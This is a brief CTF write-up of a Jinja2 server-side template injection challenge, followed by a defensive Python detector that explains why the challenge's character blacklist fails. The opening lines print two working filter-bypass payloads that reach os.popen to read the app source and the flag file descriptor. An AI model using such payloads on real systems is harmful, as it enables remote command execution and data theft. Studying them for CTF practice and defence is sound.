An obvious SSTI.
Single quotes, dots, and underscores are filtered.
Here is the exploit directly.
Read the source code:
{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[127]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["popen"]("cat%20app\x2epy")["read"]()}}
Read the flag:
{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[127]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["popen"]("cat%20/proc/self/fd/3")["read"]()}}
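I think the above should have been enough, but it just didn't read anything out; there may be some subtle difference. Using the other one, get_data, succeeded.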
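Why the character blacklist fails, shown from the defender's side as an added example (not code from the original write-up or the challenge): the filter inspects raw characters, while Jinja2 decodes `\x5f` inside string literals after the filter has run, so a check has to normalize escapes before matching. All function names and the sample values are hypothetical and constructed for illustration.

```python
import re
from urllib.parse import unquote

# Characters the challenge's blacklist rejects, per the write-up.
BLOCKED = ("'", ".", "_")

# String-literal escapes that Jinja2 decodes when it lexes a template.
_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})|\\([0-7]{1,3})")
_EXPR = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
_DUNDER = re.compile(r"__\w+?__")


def blacklist_allows(value: str) -> bool:
    """Model of the challenge filter: looks at raw characters only."""
    return not any(ch in value for ch in BLOCKED)


def normalize(value: str) -> str:
    """Undo URL encoding and literal escapes before any matching is done."""
    def decode(m: re.Match) -> str:
        if m.group(1) or m.group(2):
            return chr(int(m.group(1) or m.group(2), 16))
        return chr(int(m.group(3), 8))
    return _ESCAPE.sub(decode, unquote(value))


def dunder_hits(value: str) -> list:
    """Dunder names that appear inside template delimiters after decoding."""
    hits = []
    for expr in _EXPR.findall(normalize(value)):
        hits.extend(_DUNDER.findall(expr))
    return hits


# Constructed request values: a fragment of the payload shape above, and a benign one.
SAMPLES = [
    r'{{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"]}}',
    "Hello {{ name }}",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(blacklist_allows(s), dunder_hits(s), s)
```

A check like this is only a detection aid for logs or a WAF rule; the actual fix is to pass user input to the template as a variable rather than concatenating it into the template source.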